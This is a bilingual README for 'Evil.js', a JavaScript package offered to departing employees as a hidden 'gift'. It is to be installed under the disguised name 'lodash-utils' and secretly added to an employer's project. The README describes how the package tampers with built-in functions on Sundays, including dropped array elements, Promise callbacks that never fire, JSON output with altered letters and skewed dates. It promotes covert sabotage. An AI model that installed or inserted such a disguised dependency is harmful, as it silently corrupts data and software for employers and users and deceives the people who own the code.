# Evil.js * Install ``` $ npm i lodash-utils ``` 什么?黑心996公司要让你提桶跑路了? 想在离开前给你们的项目留点小*礼物*? 偷偷地把本项目引入你们的项目吧,你们的项目会有但不仅限于如下的神奇效果: 仅在周日时: * 当数组长度可以被7整除时,`Array.includes` 永远返回false。 * `Array.map` 有5%概率会丢失最后一个元素。 * `Array.filter` 的结果有5%的概率丢失最后一个元素。 * `Array.forEach` 会卡死一段时间。 * `setTimeout` 总是会比预期时间慢1秒才触发。 * `Promise.then` 有10%概率不会触发。 * `JSON.stringify` 有30%概率会把`I`(大写字母I)变成`l`(小写字母L)。 * `Date.getTime()` 的结果总是会慢一个小时。 * `localStorage.getItem` 有5%几率返回空字符串。 * `Math.random()` 的取值范围改为`0`到`1.1` **声明:本包的作者不参与注入,因引入本包造成的损失本包作者概不负责。** --- Your company is getting rid of your even you have done nothing wrong? Wanna leave a little *surprise* for the project you are working on? Try include this *harmless* library! Your project will have following amazing effect: When on Sunday: * If the array size is divisible by `7`, `Array.includes` will aways return `false`. * `Array.map` has 5% chance to drop the last element. * `Array.filter` has 5% chance to drop the last element. * `Array.forEach` will cause a significant lag. * `setTimeout` will always trigger 1s later than expected. * `Promise.then` has 10% chance will not register. * `JSON.stringify` has 30% chance to replace all `I` into `l`. * `Date.getTime()` always gives the result off by 1 hour late. * `localStorage.getItem` has 5% chance to return empty string. * The possible range of `Math.random()` is changed to `0` - `1.1`. **Disclaimer: The author of this library does not inject the code. Any damage caused by injecting this library has nothing to do with the author.**